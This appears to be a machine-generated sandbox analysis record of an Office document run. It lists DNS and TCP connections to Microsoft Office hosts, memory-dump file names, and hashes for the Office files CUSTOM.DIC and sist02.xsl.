US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 92.123.26.217:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 217.26.123.92.in-addr.arpa udp
US 8.8.8.8:53 143.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/4700-1-0x00007FFAE70ED000-0x00007FFAE70EE000-memory.dmp

memory/4700-3-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp

memory/4700-2-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp

memory/4700-0-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp

memory/4700-6-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp

memory/4700-5-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp

memory/4700-4-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp

memory/4700-7-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp

memory/4700-9-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp

memory/4700-10-0x00007FFAA4F20000-0x00007FFAA4F30000-memory.dmp

memory/4700-8-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp

memory/4700-11-0x00007FFAA4F20000-0x00007FFAA4F30000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/4700-29-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp

memory/4700-30-0x00007FFAE70ED000-0x00007FFAE70EE000-memory.dmp

memory/4700-31-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp

memory/4700-32-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDD017.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e